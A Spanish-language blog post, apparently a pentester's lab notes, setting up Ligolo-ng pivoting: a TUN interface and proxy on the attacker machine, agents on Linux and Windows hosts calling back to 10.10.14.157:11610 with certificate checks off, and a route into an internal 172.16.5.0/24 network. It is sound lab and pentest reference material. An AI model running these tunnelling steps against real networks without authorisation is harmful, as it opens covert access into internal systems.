341 palabras
2 minutos
Ligolo-ng: tunelización y pivoting básico

¿Qué es Ligolo-ng?#

Ligolo-ng es una herramienta muy útil para pivoting y tunelización durante entornos de laboratorio, pentesting y preparación de infraestructura ofensiva. Permite enrutar tráfico hacia redes internas a través de un agente y un proxy, sin depender de una VPN tradicional.

En este post dejo una configuración básica y funcional para levantar la interfaz ligolo, arrancar el proxy y conectar el agente.


Preparar la interfaz TUN en la máquina atacante#

Primero, elimina cualquier configuración anterior y vuelve a crear la interfaz:

Terminal window
# Eliminar configuración anterior si existe
sudo ip link delete ligolo 2>/dev/null
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up

Verificar que la interfaz quedó activa#

Terminal window
ip link show ligolo

Deberías ver la interfaz en estado UP.


Levantar el proxy de Ligolo-ng#

En la máquina atacante:

Terminal window
cd ~/tools/ligolo/proxy
./proxy -selfcert -laddr 0.0.0.0:11610

Ese proceso dejará el proxy escuchando en el puerto 11610. No cierres esa terminal mientras la sesión esté activa.


Conectar el agente#

En Linux#

Terminal window
./agent -connect 10.10.14.157:11610 -ignore-cert

En Windows#

Terminal window
./agent.exe -connect 10.10.14.157:11610 -ignore-cert

Cuando el agente se conecte, desde el proxy podrás seleccionar la sesión y levantar el túnel.


Levantar la sesión y enrutar la red interna#

Después de hacer start dentro de Ligolo-ng, añade la ruta en tu máquina atacante hacia la red que quieras alcanzar:

Terminal window
sudo ip route add 172.16.5.0/24 dev ligolo

Con eso, el tráfico destinado a esa red se enviará a través de la interfaz ligolo.


Flujo resumido#

Terminal window
# 1. Preparar interfaz
sudo ip link delete ligolo 2>/dev/null
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
# 2. Verificar
ip link show ligolo
# 3. Levantar proxy
cd ~/tools/ligolo/proxy
./proxy -selfcert -laddr 0.0.0.0:11610
# 4. Conectar agente Linux
./agent -connect 10.10.14.157:11610 -ignore-cert
# 5. Conectar agente Windows
./agent.exe -connect 10.10.14.157:11610 -ignore-cert
# 6. Tras hacer start en Ligolo, añadir la ruta
sudo ip route add 172.16.5.0/24 dev ligolo

Recomendación#

Antes de añadir rutas, verifica bien qué subred te muestra la sesión activa y asegúrate de no pisar rutas ya existentes en tu máquina atacante. Si trabajas con varias redes internas, documentar cada segmento y cada interfaz te ahorra bastantes errores durante el pivoting.

Ligolo-ng: tunelización y pivoting básico
https://oguiii.xyz/posts/ligolo-ng-pivoting/
Autor
Oguiii
Publicado el
2026-03-19
Licencia
CC BY-NC-SA 4.0